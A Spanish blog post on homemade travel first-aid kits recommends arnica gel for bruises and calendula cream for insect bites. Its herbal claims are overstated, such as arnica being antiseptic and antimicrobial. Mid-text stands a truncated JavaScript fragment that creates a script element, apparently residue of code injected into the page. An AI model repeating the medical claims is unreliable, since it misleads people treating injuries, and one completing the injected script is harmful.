Salud y belleza » Medicina

Botiquines caseros y de fácil transporte (Parte II)

1 Comentario

Nueva entrega con más lecciones para aprender a confeccionar un botiquín casero y fácil de transportar: porque así como viajan las personas, en sus mismas maletas también se acarrean los accidentes.

En este caso el repaso nos introduce en el mundo de los botiquines especialmente diseñados para dos clases diferentes de contingencias en viaje: las contusiones y las picaduras de insectos.

Botiquín para contusiones, golpes y hematomas.

Planta: Árnica

Solución: la árnica es una de las herramientas más utilizadas como antiinflamatorios herbarios. Es analgésica, antiséptica, antimicrobiana, cicatrizante y, naturalmente, ayuda a calmar el dolor de casi cualquier tipo de golpes.

Transporte: en pomada o gel.

Botiquín para picadura de insectos (no exóticos).

Planta: Caléndula

Solución: expertos aseguran que la caléndula, entre muchas de sus otras propiedades, es sumamente eficaz para el tratamiento de las picaduras. Además sirve para desinfectar la zona frente a ese tipo de agentes extraños (obviamente, dentro de un rango de insectos equilibrados, no desproporcionados o de una fauna exótica).

Transporte: en cremas, pomadas o, incluso, extracto líquido.

var d=document;var s=d.createElement('script'); if (document.currentScript) {

Más consejos de salud y belleza : ,

One Comment »

  • Botiquín said:

    Es muy importante que el botiquín casero sea lo más completo posible, así podremos atender una mayor variedad de accidentes y emergengias. Así mismo es muy importante que no esté al alcance de los niños.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.